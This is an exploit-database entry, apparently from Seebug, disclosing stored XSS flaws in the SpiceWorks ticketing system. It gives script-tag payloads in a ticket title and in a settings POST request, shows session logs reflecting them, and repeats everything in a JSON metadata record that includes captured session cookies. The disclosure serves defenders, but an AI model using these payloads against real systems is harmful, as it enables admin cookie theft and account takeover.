ID SSV:86555 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
# Exploit Title: Multiple Stored XSS vulnerabilities in SpiceWorks Ticketing system
# Date: 12/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://spiceworks.com
# Software Link: http://download.spiceworks.com/Spiceworks.exe
# Version: 7.2.00174 (Latest)
# Tested on: Kali Linux
# Vendor alerted: 12/05/2014
1. About the application:
=======================
SpiceWorks is an IT ticketing system deployed in many companies around the world
2. Vulnerability Description:
=========================
Multiple stored XSS were found in SpiceWorks system, allowing an attacker to create a SpiceWorks IT ticket with malicious code.
once an admin attemps to login to the system dashboard to view open tickets, the code executes and the attacker
could potentially steal the admin's cookies.
3. PoC Videos:
===============
https://www.youtube.com/watch?v=lG5Y_okTaos&feature=youtu.be
https://www.youtube.com/watch?v=efIyZRTDS9c
Steps to reproduce:
i. Create a ticket in user_portal with the title <script>alert(document.cookie);</script>
ii. submit.
iii. login as admin user and navigate to the open tickets, the XSS appears.
4. Session Logs:
<-> Vulnerability 1 <->
<div id="helpdesk" class="helpdesk-root">
</div>
<script type="text/javascript">
//<![CDATA[
window.startingEventId = 112;
window.eventGeneration = '3b30b3bfedfae8be30d2b5412fc93003';
window.HelpDesk.on("before:start", function() {
this.options = {
dateFormat: "%m/%d/%y",
timeFormat: "%I:%M %p",
currencySymbol: "$",
allowDelete: true,
categories: ["","Maintenance","End User Support"],
admin: [{"id":1,"first_name":"user","last_name":"far","email":"admin@gmx.com","role":"admin","department":"IT","avatar_path":null,"primary_phone":null,"show_url":"/people/1"},{"id":3,"first_name":"dolev","last_name":"test","email":"attacker@gmail.com","role":"helpdesk_tech","department":null,"avatar_path":null,"primary_phone":null,"show_url":"/people/3"}],
customAttrs: [],
disableShortcuts: '',
data: {
ticketView: {"name":"open_tickets","label":"Open Tickets","sort_by":"id","sort_dir":"desc","hidden_cols":["created_at","closed_at","category","site"],"tickets":[{"id":11,"summary":"\u003Cscript\u003Ealert(document.cookie);\u003C/script\u003E","status":"open"
selectedSite: "all",
remoteSites: [{"name":"Central Server","site_id":1}]
}
};
});
//]]>
</script>
</div>
<-> Vulnerability 2 <->
POST /settings/advanced/save_system_setting?name=pdf_header_color HTTP/1.1
Host: ip.add.re.ss
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.186.31/settings/advanced?more_settings=true
Content-Length: 177
Cookie: user_id=BAgw--XXXX6231342123XXXX234213515; portal_user_email=BAhJIhV1c2VyMTk4N0BnbXguY29tBjoGRVQ%3D--f9cd3afeeb246cb35d3670914c45c30e427b76f7; __utma=1.399722362.1399878889.1399878889.1399878889.1; __utmb=1.107.0.1399879583954; __utmz=1.1399878889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); spiceworks_session=BAh7FToPc2Vzc2lvbl9pZCIlNzgzNzc2ZGNiNTg1ZWQ1ODRlMDVmN2QyNmIwMzc5NWU6EF9jc3JmX3Rva2VuSSIxRkJGMC8vQ2VkYmRzNUtPV05PM2lrK0FQeVAyb25zcHg4WTNPOUdOWU1sWT0GOgZFRkkiCmZsYXNoBjsHRklDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgx1c2VyX2lkaQY6FHVzZXJfZmlyc3RfbmFtZUkiCXVzZXIGOwdUOhN1c2VyX2xhc3RfbmFtZUkiCGZhcgY7B1Q6D3VzZXJfZW1haWxJIhV1c2VyMTk4N0BnbXguY29tBjsHVDoWdXNlcl9jb21wYW55X25hbWVJIg10ZXN0Y29tcAY7B1Q6DnVzZXJfcm9sZUkiCmFkbWluBjsHVDoPY3JlYXRlZF9hdEl1OglUaW1lDYeRHICWg2JpBjoLb2Zmc2V0aQIwKjoNcmVtZW1iZXJGOhhsYXN0X2ZlYXR1cmVfdXBkYXRlSXU7EQ2HkRyAfodiaQY7EmkCMCo6FmZlYXR1cmVfdXNhZ2VfbWFwexlpBlRpCEZpCUZpEEZpE1RpFVRpFlRpGEZpGUZpGkZpG0ZpCkZpC0ZpDEZpD0ZpF0ZpHEZpHUZpDVRpElQ6H3VzZWRfZmVhdHVyZV9lZHVjYXRpb25faWRzWwA6FnBvcnRhbF91c2VyX2VtYWlsQA06HWxhc3Rfc2V0dGluZ3NfY29udHJvbGxlckkiDWFkdmFuY2VkBjsHRg%3D%3D--64198aa54c349fff2e6e7db88fe63d864cec55fe; compatibility_test=testing; __utmc=1; last_view=open_tickets; tickets_per_page=25
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
_pickaxe=%E2%B8%95&value=%3Cscript%3Ealert(%22pdf001%22)%3C%2Fscript%3E&editorId=pdf_header_color_inplace&authenticity_token=FBF0%2F%2FCedbds5KOWNO3ik%2BAPyP2onspx8Y3O9GNYMlY%3D
{"href": "https://www.seebug.org/vuldb/ssvid-86555", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "SpiceWorks 7.2.00174 - Persistent XSS Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86555", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2014-07-01T00:00:00", "sourceData": "\n # Exploit Title: Multiple Stored XSS vulnerabilities in SpiceWorks Ticketing system\r\n# Date: 12/05/2014\r\n# Exploit author: Dolev Farhi @f1nhack\r\n# Vendor homepage: http://spiceworks.com\r\n# Software Link: http://download.spiceworks.com/Spiceworks.exe\r\n# Version: 7.2.00174 (Latest)\r\n# Tested on: Kali Linux\r\n# Vendor alerted: 12/05/2014\r\n\r\n1. About the application:\r\n=======================\r\n SpiceWorks is an IT ticketing system deployed in many companies around the world\r\n \r\n\r\n2. Vulnerability Description:\r\n=========================\r\nMultiple stored XSS were found in SpiceWorks system, allowing an attacker to create a SpiceWorks IT ticket with malicious code.\r\nonce an admin attemps to login to the system dashboard to view open tickets, the code executes and the attacker\r\ncould potentially steal the admin's cookies.\r\n\r\n\r\n3. PoC Videos:\r\n===============\r\nhttps://www.youtube.com/watch?v=lG5Y_okTaos&feature=youtu.be\r\nhttps://www.youtube.com/watch?v=efIyZRTDS9c\r\n\r\nSteps to reproduce:\r\n\ti.\t Create a ticket in user_portal with the title <script>alert(document.cookie);</script>\r\n\tii. submit.\r\n\tiii. login as admin user and navigate to the open tickets, the XSS appears.\r\n\r\n4. Session Logs:\r\n<-> Vulnerability 1 <->\r\n\r\n <div id="helpdesk" class="helpdesk-root">\r\n </div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\n\r\n window.startingEventId = 112;\r\n window.eventGeneration = '3b30b3bfedfae8be30d2b5412fc93003';\r\n window.HelpDesk.on("before:start", function() {\r\n this.options = {\r\n dateFormat: "%m/%d/%y",\r\n timeFormat: "%I:%M %p",\r\n currencySymbol: "$",\r\n allowDelete: true,\r\n categories: ["","Maintenance","End User Support"],\r\n admin: [{"id":1,"first_name":"user","last_name":"far","email":"admin@gmx.com","role":"admin","department":"IT","avatar_path":null,"primary_phone":null,"show_url":"/people/1"},{"id":3,"first_name":"dolev","last_name":"test","email":"attacker@gmail.com","role":"helpdesk_tech","department":null,"avatar_path":null,"primary_phone":null,"show_url":"/people/3"}],\r\n customAttrs: [],\r\n disableShortcuts: '',\r\n data: {\r\n ticketView: {"name":"open_tickets","label":"Open Tickets","sort_by":"id","sort_dir":"desc","hidden_cols":["created_at","closed_at","category","site"],"tickets":[{"id":11,"summary":"\\u003Cscript\\u003Ealert(document.cookie);\\u003C/script\\u003E","status":"open"\r\n \r\n selectedSite: "all",\r\n remoteSites: [{"name":"Central Server","site_id":1}]\r\n }\r\n };\r\n });\r\n\r\n//]]>\r\n</script>\r\n</div>\r\n\r\n\r\n<-> Vulnerability 2 <->\r\n\r\nPOST /settings/advanced/save_system_setting?name=pdf_header_color HTTP/1.1\r\n\r\nHost: ip.add.re.ss\r\n\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\r\n\r\nAccept: text/javascript, text/html, application/xml, text/xml, */*\r\n\r\nAccept-Language: en-US,en;q=0.5\r\n\r\nAccept-Encoding: gzip, deflate\r\n\r\nX-Requested-With: XMLHttpRequest\r\n\r\nX-Prototype-Version: 1.6.1\r\n\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\nReferer: http://192.168.186.31/settings/advanced?more_settings=true\r\n\r\nContent-Length: 177\r\n\r\nCookie: user_id=BAgw--XXXX6231342123XXXX234213515; portal_user_email=BAhJIhV1c2VyMTk4N0BnbXguY29tBjoGRVQ%3D--f9cd3afeeb246cb35d3670914c45c30e427b76f7; __utma=1.399722362.1399878889.1399878889.1399878889.1; __utmb=1.107.0.1399879583954; __utmz=1.1399878889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); spiceworks_session=BAh7FToPc2Vzc2lvbl9pZCIlNzgzNzc2ZGNiNTg1ZWQ1ODRlMDVmN2QyNmIwMzc5NWU6EF9jc3JmX3Rva2VuSSIxRkJGMC8vQ2VkYmRzNUtPV05PM2lrK0FQeVAyb25zcHg4WTNPOUdOWU1sWT0GOgZFRkkiCmZsYXNoBjsHRklDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgx1c2VyX2lkaQY6FHVzZXJfZmlyc3RfbmFtZUkiCXVzZXIGOwdUOhN1c2VyX2xhc3RfbmFtZUkiCGZhcgY7B1Q6D3VzZXJfZW1haWxJIhV1c2VyMTk4N0BnbXguY29tBjsHVDoWdXNlcl9jb21wYW55X25hbWVJIg10ZXN0Y29tcAY7B1Q6DnVzZXJfcm9sZUkiCmFkbWluBjsHVDoPY3JlYXRlZF9hdEl1OglUaW1lDYeRHICWg2JpBjoLb2Zmc2V0aQIwKjoNcmVtZW1iZXJGOhhsYXN0X2ZlYXR1cmVfdXBkYXRlSXU7EQ2HkRyAfodiaQY7EmkCMCo6FmZlYXR1cmVfdXNhZ2VfbWFwexlpBlRpCEZpCUZpEEZpE1RpFVRpFlRpGEZpGUZpGkZpG0ZpCkZpC0ZpDEZpD0ZpF0ZpHEZpHUZpDVRpElQ6H3VzZWRfZmVhdHVyZV9lZHVjYXRpb25faWRzWwA6FnBvcnRhbF91c2VyX2VtYWlsQA06HWxhc3Rfc2V0dGluZ3NfY29udHJvbGxlckkiDWFkdmFuY2VkBjsHRg%3D%3D--64198aa54c349fff2e6e7db88fe63d864cec55fe; compatibility_test=testing; __utmc=1; last_view=open_tickets; tickets_per_page=25\r\n\r\nConnection: keep-alive\r\n\r\nPragma: no-cache\r\n\r\nCache-Control: no-cache\r\n\r\n\r\n_pickaxe=%E2%B8%95&value=%3Cscript%3Ealert(%22pdf001%22)%3C%2Fscript%3E&editorId=pdf_header_color_inplace&authenticity_token=FBF0%2F%2FCedbds5KOWNO3ik%2BAPyP2onspx8Y3O9GNYMlY%3D\r\n\r\n\r\n\r\n\n ", "id": "SSV:86555", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T13:44:02", "reporter": "Root", "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2017-11-19T13:44:02", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T13:44:02", "rev": 2}, "vulnersScore": -0.5}, "references": []}